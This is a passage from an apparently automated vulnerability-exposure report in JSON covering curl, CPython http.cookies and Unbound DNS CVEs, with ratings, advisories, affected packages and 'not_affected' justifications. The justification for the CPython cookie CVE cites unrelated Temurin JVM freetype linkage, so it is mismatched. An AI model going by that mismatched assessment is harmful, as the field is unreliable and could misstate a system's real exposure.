          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21203"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21212"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21213"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21218"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21219"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21230"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21231"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21236"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21237"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21238"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21239"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21241"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21247"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-37371"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5535"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-7264"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21490"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21491"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21494"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21497"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21500"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21501"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21503"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21504"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21505"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21518"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21519"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21520"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21521"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21522"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21523"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21525"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21529"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21531"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21534"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21536"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21540"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21543"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21546"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21555"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21559"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2025-1671.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2025:1671"
        },
        {
          "url": "https://github.com/curl/curl/commit/27959ecce75cdb2809c0bdb3286e60e08fadb519"
        },
        {
          "url": "https://hackerone.com/reports/2629968"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2024-7264.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2025-1673.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-7264"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20240828-0008/"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20241025-0006/"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20241025-0010/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6944-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6944-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-7264"
        },
        {
          "url": "https://www.oracle.com/security-alerts/cpuoct2024.html#AppendixMSQL"
        }
      ],
      "published": "2024-07-31T08:15:02+00:00",
      "updated": "2026-06-17T08:19:43+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2024-7592",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "bitnami"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.8,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        400,
        1333
      ],
      "description": "There is a LOW severity vulnerability affecting CPython, specifically the\n'http.cookies' standard library module.\n\n\nWhen parsing cookies that contained backslashes for quoted characters in\nthe cookie value, the parser would use an algorithm with quadratic\ncomplexity, resulting in excess CPU resources being used while parsing the\nvalue.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-7592"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2025:3634"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-7592"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2305879"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-7592"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2025-3634.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2025:3634"
        },
        {
          "url": "https://github.com/python/cpython/commit/391e5626e3ee5af267b97e37abc7475732e67621"
        },
        {
          "url": "https://github.com/python/cpython/commit/44e458357fca05ca0ae2658d62c8c595b048b5ef"
        },
        {
          "url": "https://github.com/python/cpython/commit/a77ab24427a18bff817025adb03ca920dc3f1a06"
        },
        {
          "url": "https://github.com/python/cpython/commit/b2f11ca7667e4d57c71c1c88b255115f16042d9a"
        },
        {
          "url": "https://github.com/python/cpython/commit/d4ac921a4b081f7f996a5d2b101684b67ba0ed7f"
        },
        {
          "url": "https://github.com/python/cpython/commit/d662e2db2605515a767f88ad48096b8ac623c774"
        },
        {
          "url": "https://github.com/python/cpython/commit/dcc3eaef98cd94d6cb6cb0f44bd1c903d04f33b1"
        },
        {
          "url": "https://github.com/python/cpython/issues/123067"
        },
        {
          "url": "https://github.com/python/cpython/pull/123075"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2024-7592.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2025-3634.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2024/12/msg00000.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/HXJAAAALNUNGCQUS2W7WR6GFIZIHFOOK/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-7592"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20241018-0006/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7015-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7015-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-7592"
        }
      ],
      "published": "2024-08-19T19:15:08+00:00",
      "updated": "2026-06-17T08:20:30+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": "Temurin JVM binary is not linked against freetype library:\n$ ldd /usr/lib/jvm/temurin-17-jre/bin/java\nlinux-vdso.so.1 (0x0000ffff8cd00000)\nlibjli.so => /usr/lib/jvm/temurin-17-jre/bin/../lib/libjli.so (0x0000ffff8cc70000)\nlibpthread.so.0 => /lib64/libpthread.so.0 (0x0000ffff8cc3b000)\nlibdl.so.2 => /lib64/libdl.so.2 (0x0000ffff8cc1a000)\nlibc.so.6 => /lib64/libc.so.6 (0x0000ffff8caa4000)\n/lib/ld-linux-aarch64.so.1 (0x0000ffff8ccc2000)"
      }
    },
    {
      "id": "CVE-2025-11411",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        349
      ],
      "description": "NLnet Labs Unbound up to and including version 1.24.1 is vulnerable to possible domain hijack attacks. Promiscuous NS RRSets that complement positive DNS replies in the authority section can be used to trick resolvers to update their delegation information for the zone. Usually these RRSets are used to update the resolver's knowledge of the zone's name servers. A malicious actor can exploit the possible poisonous effect by injecting NS RRSets (and possibly their respective address records) in a reply. This could be done for example by trying to spoof a packet or fragmentation attacks. Unbound would then proceed to update the NS RRSet data it already has since the new data has enough trust for it, i.e., in-zone data for the delegation point. Unbound 1.24.1 includes a fix that scrubs unsolicited NS RRSets (and their respective address records) from replies mitigating the possible poison effect. Unbound 1.24.2 includes an additional fix that scrubs unsolicited NS RRSets (and their respective address records) from YXDOMAIN and non-referral nodata replies, further mitigating the possible poison effect.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-11411"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2025/11/26/4"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:18556"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:18931"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-11411"
        },
        {
          "url": "https://bugzilla.redhat.com/2279942"
        },
        {
          "url": "https://bugzilla.redhat.com/2405706"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2279942"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2405706"
        },
        {
